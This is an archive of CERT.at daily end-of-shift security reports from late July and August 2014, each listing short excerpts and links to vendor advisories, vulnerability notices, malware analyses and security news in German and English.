- Daily - CERT.at

Tageszusammenfassung - Montag 11-08-2014
by Daily end-of-shift report 11 Aug '14

11 Aug '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 08-08-2014 18:00 − Montag 11-08-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Cisco Unity Connection SQL Injection Vulnerability *** --------------------------------------------- CVE-2014-3336 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Splunk Bugs Permit Remote Cross-Site Scripting and Remote Authenticated Directory Traversal Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1030690 *** Incident Response with Triage-ir, (Sun, Aug 10th) *** --------------------------------------------- In many cases having a full disk image is not an option during an incident. Imagine that you are suspecting that you have dozen of infected or compromised system. Can you spend 2-3 hours to make a forensic copy of hard disks hundred computers? In such situation fast forensics is the solution for such situation. Instead of copying everything collecting some files that may contain an evidence can solve this issue. In this diary I am going to talk about an application that will collect most of... --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18509&rss *** Verifying preferred SSL/TLS ciphers with Nmap, (Mon, Aug 11th) *** --------------------------------------------- In last year or two, there has been a lot of talk regarding correct usage of SSL/TLS ciphers on web servers. Due to various incidents more or less known incidents, web sites today should use PFS (Perfect Forward Secrecy), a mechanism that is used when an SSL/TLS connection is established and symmetric keys exchanged. PFS ensures that, in case an attacker obtains the server's private key, he cannot decrypt previous SSL/TLS connections to that server. If PFS is not used (if RSA is used to --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18513&rss *** WordHound erzeugt maßgeschneiderte Wörterbücher für Passwort-Knacker *** --------------------------------------------- Wörterbuch-Attacken auf Passwort-Hashes dauern lange und sind nicht immer erfolgreich. Schneidet man die durchzuprobierenden Passwörter aber auf das Ziel zurecht, sind selbst vergleichbar komplizierte Kennwörter unter Umständen nicht mehr sicher. --------------------------------------------- http://www.heise.de/newsticker/meldung/WordHound-erzeugt-massgeschneiderte-… *** You cannot cyberhijack an airplane, but you can create mischief *** --------------------------------------------- Hacking a plane and taking control of the aircraft is a considerably scary prospect, but two speakers at DefCon 22 in Las Vegas quashed the notion and put worries to rest. --------------------------------------------- http://www.scmagazine.com/defcon-you-cannot-cyberhijack-an-airplane-but-you… *** Cybercrime Report: Soziale Netzwerke zunehmend betroffen *** --------------------------------------------- 2013 wurden in Österreich 11.199 Fälle von Cybercrime angezeigt. Als Motive sieht das Bundeskriminalamt finanzielle Interessen, Langeweile und Hacktivism. [...] Neue Technologien werden in Zukunft weiterhin neue Erscheinungsformen von Cyberkriminalität begünstigen, heißt es im Report. Genannt wurde der Einsatz von "NFC" (Near Field Communication) zur Durchführung kontaktloser Zahlungsvorgänge, aber auch Verkehrsmittel, die mit der Möglichkeit zur Netzwerk-Kommunikation ausgestattet werden, wie zum Beispiel Smart-Vehicles und Drohnen, warnt der Bericht abschließend. --------------------------------------------- http://futurezone.at/netzpolitik/cybercrime-report-soziale-netzwerke-zunehm…

1 0

Tageszusammenfassung - Freitag 8-08-2014
by Daily end-of-shift report 08 Aug '14

08 Aug '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 07-08-2014 18:00 − Freitag 08-08-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Massives Datenleck *** --------------------------------------------- Massives Datenleck | 6. August 2014Diverse Medien berichten, dass eine kriminelle Gruppe aus Russland eine gigantische Zahl an Zugangsdaten erbeutet hat. Siehe u.a.: New York Times, Slate, WSJ, DerStandard, Futurezone, Heise, ... | Woher die Credentials wirklich stammen (die Geschichte mit dem Botnet und SQL-Injection klingt ein bisschen nach einem Bericht aus 2013), ist auch nicht restlos geklärt: In anderen Fällen war das eine Mischung aus diversen Kampagnen, sowohl Einbrüchen in... --------------------------------------------- http://www.cert.at/services/blog/20140806143111-1213.html *** Black Hat USA Talks: Investigating PowerShell Attacks *** --------------------------------------------- Threat actors are always eager to adopt new tools, tactics, and procedures that can help them evade detection and conduct their mission. Incident responders from Mandiant have observed increasing use of PowerShell by targeted attackers to conduct command-and-control in compromised... --------------------------------------------- http://www.fireeye.com/blog/technical/2014/08/black-hat-usa-talks-investiga… *** IETF will selbst elliptische Kurven standardisieren *** --------------------------------------------- Künftig will die IETF nicht mehr nur einfach die von der NIST empfohlenen Krypto-Standards übernehmen, sondern eigene schaffen. Die NIST hingegen versucht weiterhin, ihr ramponiertes Image als unabhängige Instanz zu retten. --------------------------------------------- http://www.heise.de/security/meldung/IETF-will-selbst-elliptische-Kurven-st… *** IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect WebSphere Application Server July 2014 CPU *** --------------------------------------------- There are multiple vulnerabilities in IBM SDK Java Technology Edition that is shipped with IBM WebSphere Application Server. These issues were disclosed as part of the IBM Java SDK updates in July 2014. CVE(s): CVE-2014-4263 and CVE-2014-4244, Affected product(s) and affected version(s): IBM Java SDK shipped with IBM WebSphere Application Server Version 8.5.0.0 through 8.5.5.2, Version 8.0.0.0 through 8.0.0.9, Version 7.0.0.0 through 7.0.0.33, Version 6.1.0.0 through 6.1.0.47 --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** Checking for vulnerabilities in the Smart Grid System, (Thu, Aug 7th) *** --------------------------------------------- SCADA systems are not composed the same way as regular IT systems. Therefore, the risk and vulnerability assessment cannot be performed as it is done for any other IT system. The most important differences are: SCADA Pentesting should not be done in production environment: SCADA devices are very fragile and some activities that could pose harmless to regular IT environments could be catastrophic to the process availability. Think of massive blackouts or no water supply for a city. SCADA --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18499&rss *** Wordpress: Defektes Plugin erlaubt Admin-Zugriff *** --------------------------------------------- Das Wordpress-Plugin Custom Contacts Form hat einen Fehler, der es Angreifern erlaubt, administrative Rechte über eine Webseite zu erhalten. Es gibt bereits einen Patch. --------------------------------------------- http://www.golem.de/news/wordpress-defektes-plugin-erlaubt-admin-zugriff-14… *** Analyzing the Fake ID Android vulnerability *** --------------------------------------------- In this video shot at Black Hat 2014 in Las Vegas, Jeff Forristal of Bluebox Security sits with Danielle Walker, reporter at SC Magazine, to discuss the Fake ID Android vulnerability. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/Tp9gYIOHaFg/ *** Black Hat 2014: 75 Prozent aller mobilen Kassensysteme verwundbar *** --------------------------------------------- Knapp drei viertel aller gängigen mobilen Terminals zum Auslesen von Kreditkarten basieren auf der selben Hard- und Software. Forscher haben demonstriert, wie sie die Geräte unter Kontrolle bringen und so dem Kartenmissbrauch Tür und Tor öffnen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Black-Hat-2014-75-Prozent-aller-mobi… *** Patchday: Microsoft behebt kritische Lücken in Windows und IE *** --------------------------------------------- Am kommenden Patchday veröffentlicht Microsoft insgesammt neun Sicherheitsupdates, davon sind zwei als "kritisch" und sieben weitere als "wichtig" markiert. --------------------------------------------- http://www.heise.de/newsticker/meldung/Patchday-Microsoft-behebt-kritische-… *** Microsoft: Keine Updates mehr für ältere Internet Explorer *** --------------------------------------------- Ab Anfang 2016 will Microsoft ältere Internet-Explorer-Versionen nicht mehr unterstützen. Bis dahin sollten Windows-Nutzer den Webbrowser aktualisieren, um weiterhin Updates zu erhalten. --------------------------------------------- http://www.heise.de/security/meldung/Microsoft-Keine-Updates-mehr-fuer-aelt… *** How to Use Your Cat to Hack Your Neighbor's Wi-Fi *** --------------------------------------------- Late last month, a Siamese cat named Coco went wandering in his suburban Washington, DC neighborhood. He spent three hours exploring nearby backyards. He killed a mouse, whose carcass he thoughtfully brought home to his octogenarian owner, Nancy. And while he was out, Coco mapped dozens of his neighbors' Wi-Fi networks, identifying four routers that used... --------------------------------------------- http://feeds.wired.com/c/35185/f/661467/s/3d4f7cee/sc/10/l/0L0Swired0N0C20A… *** HPSBHF03084 rev.1 HP PCs with UEFI Firmware, Execution of Arbitrary Code *** --------------------------------------------- Potential security vulnerabilies have been identified with certain HP PCs with UEFI Firmware. The vulnerabilities could be exploited to allow execution of arbitrary code. --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HPSBUX03087 SSRT101413 rev.1 - HP-UX CIFS Server (Samba), Remote Denial of Service (DoS), Execution of Arbitrary Code, Unauthorized Access *** --------------------------------------------- Potential security vulnerabilities have been identified with HP-UX CIFS-Server (Samba). The vulnerabilities could be exploited remotely to cause a Denial of Service (DoS). --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Neues Sysinternals-Tool hilft bei der Malware-Suche *** --------------------------------------------- Mit dem Programm Sysmon ist die beliebte Werkzeugsammlung von Microsoft Sysinternals um ein neues Tool zum Aufspüren verdächtiger Aktivitäten auf Windows-Rechnern gewachsen. --------------------------------------------- http://www.heise.de/security/meldung/Neues-Sysinternals-Tool-hilft-bei-der-…

1 0

Tageszusammenfassung - Donnerstag 7-08-2014
by Daily end-of-shift report 07 Aug '14

07 Aug '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 06-08-2014 18:00 − Donnerstag 07-08-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Cisco IOS Software and Cisco IOS XE Software EnergyWise Crafted Packet Denial of Service Vulnerability *** --------------------------------------------- cisco-sa-20140806-energywise --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Security expert calls home routers a clear and present danger *** --------------------------------------------- In Black Hat Q&A, In-Q-Tel CISO says home routers are "critical infrastructure." --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/iXnyWy8k6JU/ *** Black Hat 2014: Netzbetreiber-Software zum Fernsteuern von Mobilgeräten erlaubt Missbrauch *** --------------------------------------------- Auf zwei Milliarden Mobilfunkgeräten läuft eine verwundbare Software, die Netzbetreibern zum Kontrollieren der Geräte dient. Mit geringem Aufwand können Angreifer die Geräte unbemerkt aus der Ferne manipulieren und so beispielsweise Datenverkehr mitschneiden. --------------------------------------------- http://www.heise.de/security/meldung/Black-Hat-2014-Netzbetreiber-Software-… *** Internet Explorer begins blocking out-of-date ActiveX controls *** --------------------------------------------- As part of our ongoing commitment to delivering a more secure browser, starting August 12th Internet Explorer will block out-of-date ActiveX controls. ActiveX controls are small apps that let Web sites provide content, like videos and games, and let you interact with content like toolbars. Unfortunately, because many ActiveX controls aren't automatically updated, they can become outdated as new versions are released. --------------------------------------------- http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-bloc… *** Cisco 2014 Midyear Security Report: Exposing Weak Links to Strengthen the Security Chain *** --------------------------------------------- You may be thinking, "What could have possibly changed since January?" True to form, the attacker community continues to evolve, innovate, and think up new ways to discover and exploit weak links in the security chain. Also true to form, they sometimes simply use tried and true methods to exploit some of the same old vulnerabilities that continue to present themselves. --------------------------------------------- https://blogs.cisco.com/security/cisco-2014-midyear-security-report-exposin… *** Securing VoIP systems *** --------------------------------------------- Countermeasures for these security issues are given below in greater detail: - Encryption - Firewalls - Traffic Analysis - Improved network Security - Authentication mechanisms - Apply appropriate patches - Turn off unnecessary protocols... --------------------------------------------- http://resources.infosecinstitute.com/securing-voip-systems/ *** Jetzt updaten: Ältere Synology NAS-Geräte anfällig für Ransomware *** --------------------------------------------- Der NAS-Hersteller Synology hat Details zu der Lücke bekannt gegeben, die der Erpressungs-Trojaner SynoLocker ausnutzt, um die Daten seiner Opfer zu verschlüsseln. Nach Informationen des Herstellers betrifft das Sicherheitsproblem nur ältere Firmware-Versionen und wurde im Dezember 2013 behoben. Die DiskStation-Manager-Software (DSM) Version 4.3-3810 oder älter soll betroffen sein, ein Update auf DSM 5.0 soll Abhilfe schaffen. --------------------------------------------- http://www.heise.de/newsticker/meldung/Jetzt-updaten-Aeltere-Synology-NAS-G… *** OpenSSL-Updates - diesmal nicht ganz so schlimm *** --------------------------------------------- Die OpenSSL-Entwickler beseitigen neun Sicherheitslücken, die meisten von Google-Forschern entdeckt. Allerdings ist diesmal nichts wirklich dramatisches dabei. --------------------------------------------- http://www.heise.de/newsticker/meldung/OpenSSL-Updates-diesmal-nicht-ganz-s… *** Hintergrund: Politische Lösungen für eine sichere Zukunft der Kommunikation *** --------------------------------------------- Nach den Snowden-Enthüllungen steht eine Diskussion an, was wir zukünftig besser machen können, um Spionage und großflächige Massenüberwachung zu verhindern. Neben der besserer Technik braucht es da auch neue politische Ansätze, meint Linus Neumann. --------------------------------------------- http://www.heise.de/security/artikel/Politische-Loesungen-fuer-eine-sichere… *** Security Notice-Statement on 9 OpenSSL Vulnerabilities *** --------------------------------------------- Aug 07, 2014 20:29 --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…

1 0

Tageszusammenfassung - Mittwoch 6-08-2014
by Daily end-of-shift report 06 Aug '14

06 Aug '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 05-08-2014 18:00 − Mittwoch 06-08-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Another Bypass Identified in PayPal 2FA *** --------------------------------------------- A security researcher has uncovered a simple method for bypassing the two-factor authentication mechanism that PayPal uses to protect accounts that are tied to eBay accounts. The vulnerability is related to the way that the login flow works when a user is prompted to connect her eBay account to her PayPal account. The eBay and... --------------------------------------------- http://threatpost.com/another-bypass-identified-in-paypal-2fa/107605 *** Mozilla zukünftig mit zentralen Sperrlisten *** --------------------------------------------- Sichere Internet-Verbindungen erfordern Mechanismen, kompromittierte Zertifikate als ungültig zu erklären. Die aktuellen Verfahren dazu funktionieren jedoch nicht. Zukünftig soll das bei Firefox und Co die OneCRL richten. --------------------------------------------- http://www.heise.de/security/meldung/Mozilla-zukuenftig-mit-zentralen-Sperr… *** Researchers release CryptoLocker decryption tool *** --------------------------------------------- Tool uses private keys found in database of victims.The CryptoLocker ransomware is one of the nastiest pieces of malware to have targeted Internet users in recent years. The malware uses strong file encryption (more particularly, AES encryption with a key that has been encrypted using an RSA-2048 private key) to deny the user access to their files unless they pay a ransom of around US$300. At a time when we often seem to be learning about accidental or intentional vulnerabilities in encryption,... --------------------------------------------- http://www.virusbtn.com/blog/2014/08_06.xml?rss *** CipherShed *** --------------------------------------------- CipherShed is free (as in free-of-charge and free-speech) encryption software for keeping your data secure and private. It started as a fork of the now-discontinued TrueCrypt Project. --------------------------------------------- http://n0where.net/ciphershed/ *** Web-Fu - Chrome extension for pentesting web applications *** --------------------------------------------- Chrome extension for pentesting web applications. Web-fu Is a web hacking tool focused on discovering and exploiting web vulnerabilitites. --------------------------------------------- http://hack-tools.blackploit.com/2014/08/web-fu-chrome-extension-for-pentes…

1 0

Tageszusammenfassung - Dienstag 5-08-2014
by Daily end-of-shift report 05 Aug '14

05 Aug '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 04-08-2014 18:00 − Dienstag 05-08-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** Synology - erste Informationen bezüglich "Synolocker" *** --------------------------------------------- Special Notes SynoLocker Message Issue - If NAS is not infected: First, close all open ports for external access for now. Backup the data on the DiskStation and update DSM to the latest version. Synology will provide further information as soon as possible if you are vulnerable. If NAS is infected, first do not trust (and ignore) any unauthorized, non-Synology messages or emails. Hard shut down the DiskStation to prevent any further issues. --------------------------------------------- https://myds.synology.com/support/support_form.php?lang=us *** Synolocker: Why OFFLINE Backups are important, (Tue, Aug 5th) *** --------------------------------------------- One current threat causing a lot of sleepless nights to victims is "Cryptolocker" like malware. Various variations of this type of malware are still haunting small businesses and home users by encrypting files and asking for ransom to obtain the decryption key. Your best defense against this type of malware is a good backup. Shadow volume copies may help, but arent always available and complete. In particular for small businesses, various simple NAS systems have become popular over --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18481&rss *** Ubuntu-Sperrbildschirm verliert Tastatureingaben *** --------------------------------------------- Eine jetzt geschlossene Sicherheitslücke im Sperrbildschirm der Linux-Distribution Ubuntu könnte zur Folge haben, dass Nutzer ihr Passwort aus Versehen öffentlich im Internet bekanntgeben. --------------------------------------------- http://www.heise.de/newsticker/meldung/Ubuntu-Sperrbildschirm-verliert-Tast… *** Barracuda Web Application Firewall Reusable URL-Based Authentication Tokens Let Remote Users Bypass Authentication *** --------------------------------------------- http://www.securitytracker.com/id/1030665 *** Evernote Patches Vulnerability in Android App *** --------------------------------------------- We have previously discussed an Android vulnerability that may lead to user data being captured or used to launch attacks. We discovered that the popular Android app for Evernote contained the said vulnerability. We disclosed the details to Evernote, and they took action by issuing an update to the Android version of their app. Evernote has added additional... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/BBLQmuk3RrQ/ *** Symantec Endpoint Protection Local Client Application Device Control Buffer Overflow *** --------------------------------------------- Revisions None Severity CVSS2Base ScoreImpactExploitabilityCVSS2 VectorSEP Local Client ADC Buffer Overflow- Medium6.... --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** Bugtraq: SEC Consult SA-20140805-0 :: Multiple vulnerabilities in Readsoft Invoice Processing and Process Director *** --------------------------------------------- http://www.securityfocus.com/archive/1/533024 *** A Peek Into the Lions Den - The Magnitude [aka PopAds] Exploit Kit *** --------------------------------------------- Recently we managed to have an unusual peek into the content that is used on the servers of the prevalent exploit kit, Magnitude. In this blog post we'll review its most up-to-date administration panel and capabilities, as well as review some infection statistics provided by Magnitude over the course of several weeks. These days, after the arrest of Paunch, Blackhole exploit kit creator, exploit kit developers and sellers have learned their lesson regarding doing business in the --------------------------------------------- http://blog.spiderlabs.com/2014/08/a-peek-into-the-lions-den-the-magnitude-… *** Vulnerability in Spotify Android App May Lead to Phishing *** --------------------------------------------- We have discovered a vulnerability that affects versions of the Spotify app for Android older than 1.1.1. If exploited, the vulnerability can allow bad guys to control what is being displayed on the app interface. This vulnerability can be potentially abused by cybercriminals to launch phishing attacks that may result to information loss or theft. --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/GZKakDZwRhw/

1 0

Tageszusammenfassung - Montag 4-08-2014
by Daily end-of-shift report 04 Aug '14

04 Aug '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 01-08-2014 18:00 − Montag 04-08-2014 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter *** ZDI-14-273: AlienVault OSSIM av-centerd Remote Code Execution Vulnerability *** --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault OSSIM. Authentication is not required to exploit this vulnerability. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-14-273/ *** Remote code execution on Android devices *** --------------------------------------------- You walk into a coffee shop and take a seat. While waiting for your coffee, you take out your smartphone and start playing a game you downloaded the other day. Later, you go to work and check your email in the elevator. Without you knowing, an attacker has just gained a foothold in your corporate... --------------------------------------------- http://labs.bromium.com/2014/07/31/remote-code-execution-on-android-devices/ *** POWELIKS: Malware Hides In Windows Registry *** --------------------------------------------- We spotted a malware that hides all its malicious codes in the Windows Registry. The said tactic provides evasion and stealth mechanisms to the malware, which Trend Micro detects as TROJ_POWELIKS.A. When executed, TROJ_POWELIKS.A downloads files, which can cause further system infection. Systems affected by this malware risk being infected by other malware, thus causing further... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/OEAKGdXwSnc/ *** All Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon, (Sat, Aug 2nd) *** --------------------------------------------- A remote code execution in nmbd (the NetBIOS name services daemon) has been found in Samba versions 4.0.0 to 4.1.10. ( assgined CVE-2014-3560) and a patch has been release by the team at samba.org. Heres the details from http://www.samba.org/samba/security/CVE-2014-3560 =========== Description =========== All current versions of Samba 4.x.x are vulnerable to a remote code execution vulnerability in the nmbd NetBIOS name services daemon. A malicious browser can send packets that may overwrite --------------------------------------------- https://isc.sans.edu/diary.html?storyid=18471&rss *** TP-Link TL-WR740N v4 arbitrary shell command execution *** --------------------------------------------- Topic: TP-Link TL-WR740N v4 arbitrary shell command execution Risk: High Text:# Exploit Title: TP-Link TL-WR740N v4 router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) arbitrary shell command execution # Dat... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014080013 *** Verschlüsselungstrojaner attackiert Synology-Speichersysteme *** --------------------------------------------- Cyber-Erpresser haben einen neuen, direkten Weg gefunden, um das digitale Hab und Gut ihrer Opfer als Geisel zu nehmen: Sie nutzen eine Sicherheitslücke in der NAS-Firmware, um den gesamten Netzwerkspeicher zu verschlüsseln. --------------------------------------------- http://www.heise.de/newsticker/meldung/Verschluesselungstrojaner-attackiert… *** China boots Kaspersky and Symantec off security contractor list *** --------------------------------------------- Foreign firms dropped from roll of approved infosec vendors Kaspersky Labs and Symantec have both been booted off China's list of approved security vendors for government agencies, as the country continues to tighten up against foreign tech firms in the wake of the NSA indiscriminate surveillance revelations. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/08/04/kaspersky_s… *** Bugtraq: ownCloud Unencrypted Private Key Exposure *** --------------------------------------------- http://www.securityfocus.com/archive/1/533010 *** Backdoor Techniques in Targeted Attacks *** --------------------------------------------- Backdoors are an essential part of targeted attacks, as they allow an external threat actor to exercise control over any compromised machines. These allow the threat actor to collect information and move laterally within the targeted organization. Our investigations into various targeted attacks have showed that a wide variety of tactics are used by backdoors to carry out... --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/fHW4IPov8YE/ *** IBM Security Bulletin: Multiple vulnerabilities in current releases of the IBM WebSphere Real Time *** --------------------------------------------- Java SE issues disclosed in the Oracle July 2014 Critical Patch Update, plus 1 additional vulnerability CVE(s): CVE-2014-3086, CVE-2014-4227, CVE-2014-4262, CVE-2014-4219, CVE-2014-4209, CVE-2014-4220, CVE-2014-4268, CVE-2014-4218, CVE-2014-4252, CVE-2014-4266, CVE-2014-4265, CVE-2014-4221, CVE-2014-4263, CVE-2014-4244 and CVE-2014-4208 Affected product(s) and affected version(s): IBM WebSphere Real Time Version 3 Service Refresh 7 and earlier Refer to the following reference URLs for --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** IBM Security Bulletin: Security vulnerabilities in Apache Tomcat in Rational DOORS Web Access *** --------------------------------------------- The Apache Tomcat application server in installations of IBM Rational DOORS Web Access version contains security vulnerabilities. CVE(s): CVE-2013-4322, CVE-2013-4590, CVE-2014-0096, CVE-2014-0099 and CVE-2014-0119 Affected product(s) and affected version(s): Rational DOORS Web Access version 9.6.0.x, 9.5.2.x, 9.5.1.x, 9.5.0.x, 1.5.0.x, 1.4.0.4 Refer to the following reference URLs for remediation and additional vulnerability details: Source Bulletin: --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin…

1 0

Tageszusammenfassung - Freitag 1-08-2014
by Daily end-of-shift report 01 Aug '14

01 Aug '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 31-07-2014 18:00 − Freitag 01-08-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Russian ransomware author takes the easy route *** --------------------------------------------- Symantec Security Response has observed a new variant of ransomcrypt malware which is easy to update and uses open source components to encrypt files. The variant, detected as Trojan.Ransomcrypt.L, uses a legitimate open source implementation of the OpenPGP standard to encrypt files on the victim’s computer. The threat then displays a ransom notice in Russian, asking the user to pay in order to unlock the files. --------------------------------------------- http://www.symantec.com/connect/blogs/russian-ransomware-author-takes-easy-… *** Announcing EMET 5.0 *** --------------------------------------------- Today, we are excited to announce the general availability of the Enhanced Mitigation Experience Toolkit (EMET) 5.0. As many of you already know, EMET is a free tool, designed to help customers with their defense in depth strategies against cyberattacks, by helping detect and block exploitation techniques .. --------------------------------------------- http://blogs.technet.com/b/srd/archive/2014/07/31/announcing-emet-v5.aspx *** Backoff - Technical Analysis *** --------------------------------------------- As discussed in the an advisory published by US-CERT, Trustwave SpiderLabs has discovered a previously unidentified family of Point of Sale (PoS) malware. This blog post serves as a technical analysis of the Backoff malware family. While a number .. --------------------------------------------- http://blog.spiderlabs.com/2014/07/backoff-technical-analysis.html *** BadUSB: Wenn USB-Geräte böse werden *** --------------------------------------------- Wer die Firmware eines USB-Sticks kontrolliert, kann den zu einem perfekten Trojaner umfunktionieren. Deutsche Forscher zeigen, dass das komplett via Software möglich ist und sich damit ganz neue Infektions-Szenarien eröffnen. --------------------------------------------- http://www.heise.de/security/meldung/BadUSB-Wenn-USB-Geraete-boese-werden-2… *** Backups - The Forgotten Website Security Pillar *** --------------------------------------------- I travel a lot (a lot might actually be an understatement these days), but the travel always revolves around a couple common threads - namely website security education and awareness. In these travels, regardless of the community I am engaging with, there are always common questions .. --------------------------------------------- http://blog.sucuri.net/2014/07/backups-the-forgotten-website-security-pilla… *** The Severe Flaw Found in Certain File Locker Apps *** --------------------------------------------- Protecting data has always been one of the most important aspects of our digital life. Given the amount of activity done on smartphones, this is especially rings true for smartphones. While users may use the built-in privacy and security settings of their devices, others take it a step further and employ security .. --------------------------------------------- http://blog.trendmicro.com/trendlabs-security-intelligence/the-severe-flaw-… *** MediaWiki Input Validation Flaws Permit Cross-Site Scripting and Clickjacking Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1030660 *** Offensive Security reports of Symantec Endpoint Protection zero-day vulnerability (July 2014) *** --------------------------------------------- This Knowledge Base article will be updated as further information becomes available. Please subscribe to this document to receive update notifications automatically. To mitigate this issue while research is underway and solutions are being identified, uninstall or disable the sysplant driver. --------------------------------------------- http://www.symantec.com/business/support/index?page=content&id=TECH223338 *** Backdoor.Gates: Also Works for Windows *** --------------------------------------------- We have received reports about a Linux malware known as Backdoor.Gates. Analysis showed that this malware has the following features .. --------------------------------------------- http://www.f-secure.com/weblog/archives/00002728.html *** SubSTATION Server Telegyr 8979 Master Vulnerabilities *** --------------------------------------------- This advisory provides mitigation details for a Buffer Overflow Vulnerability in the SUBNET Solutions Inc (SUBNET), SubSTATION Server 2, Telegyr 8979 Master .. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-196-01 *** Yes, Hackers Could Build an iPhone Botnet - Thanks to Windows *** --------------------------------------------- A reminder to Apple and smug iPhone owners: Just because iOS has never been the victim of a widespread malware outbreak doesn't mean mass iPhone hacking isn't still possible. Now one group of security researchers plans .. --------------------------------------------- http://www.wired.com/2014/08/yes-hackers-could-build-an-iphone-botnetthanks… *** Citadel Malware Variant Allows Attackers Remote Access, Even After Removal *** --------------------------------------------- A new variant of the Citadel banking Trojan has been discovered where the attackers are using Windows remote shell commands to be enable Remote Desktop Protocol access, even if the malware is discovered and removed. --------------------------------------------- http://threatpost.com/citadel-malware-variant-allows-attackers-remote-acces…

1 0

Tageszusammenfassung - Donnerstag 31-07-2014
by Daily end-of-shift report 31 Jul '14

31 Jul '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 30-07-2014 18:00 − Donnerstag 31-07-2014 18:00 Handler: Alexander Riepl Co-Handler: n/a *** Innominate mGuard Unauthorized Leakage of System Data *** --------------------------------------------- Exploitation of this vulnerability could allow a remote unauthenticated user access to release configuration information. While this is a minor vulnerability, it represents a method for further network reconnaissance. --------------------------------------------- http://ics-cert.us-cert.gov//advisories/ICSA-14-189-02 *** How safe is your quantified self? Tracking, monitoring, and wearable tech *** --------------------------------------------- Self-tracking enthusiasts are generating a torrent of personal information through apps and devices. Is this data safe from prying eyes? --------------------------------------------- http://www.symantec.com/connect/blogs/how-safe-your-quantified-self-trackin… *** Why the Security of USB Is Fundamentally Broken *** --------------------------------------------- Computer users pass around USB sticks like silicon business cards. Although we know they often carry malware infections, we depend on antivirus scans and the occasional reformatting to keep our thumbdrives from becoming the carrier for the .. --------------------------------------------- http://www.wired.com/2014/07/usb-security/ *** TA14-212A: Backoff Point-of-Sale Malware *** --------------------------------------------- “Backoff” is a family of PoS malware and has been discovered recently. The malware family has been witnessed on at least three separate forensic investigations. Researchers have identified three primary variants to the “Backoff” malware including .. --------------------------------------------- https://www.us-cert.gov/ncas/alerts/TA14-212A *** Takedowns: Touchdown or Turnover? *** --------------------------------------------- Over the last several months malware takedowns have made headlines. But what is really involved in such an operation? The recent takedowns have been a collaborative effort mostly between the private sector and government entities, with academic researchers also playing a role. While some operations included arrests, and others included a civil lawsuit, .. --------------------------------------------- http://www.seculert.com/blog/2014/07/takedowns-touchdown-or-turnover.html *** 3 security mistakes small companies make and how to avoid them *** --------------------------------------------- Dedicated IT staff are a luxury most very small businesses do without but those organisations still need to find a way to secure their computers against cyber ciminals who arent looking to cut them a break just because they're small. --------------------------------------------- http://nakedsecurity.sophos.com/2014/07/31/3-security-mistakes-small-compan… *** How to Hunt Down Phishing Kits *** --------------------------------------------- Sites like phishtank and clean-mx act as crowdsourced phishing detection and validation. By knowing how to look, you can consistently find interesting information about how attackers work, and the tools they use to conduct phishing campaigns. This post will give an example of how phishing kits are used, how to find them, as well as show a case study into other .. --------------------------------------------- https://jordan-wright.github.io/blog/2014/07/30/how-to-hunt-down-phishing-k… *** Spy of the Tiger *** --------------------------------------------- A recent report documents a group of attackers known as 'PittyTiger' that appears to have been active since at least 2011; however, they may have been operating as far back as 2008. We have been monitoring the activities of this .. --------------------------------------------- http://www.fireeye.com/blog/technical/threat-intelligence/2014/07/spy-of-th… *** Angriff auf Videospiele-Hersteller: Hacker haben es auf Quellcode abgesehen *** --------------------------------------------- Die Hacker der "Threat Group 3279" sind seit Jahren aktiv und versuchen, Quellcode von Spielen zu stehlen und die Sicherheitsvorkehrungen der dazugehörigen DRM-Systeme zu knacken. Die Gruppe soll aus China stammen. --------------------------------------------- http://www.heise.de/security/meldung/Angriff-auf-Videospiele-Hersteller-Hac…

1 0

Tageszusammenfassung - Mittwoch 30-07-2014
by Daily end-of-shift report 30 Jul '14

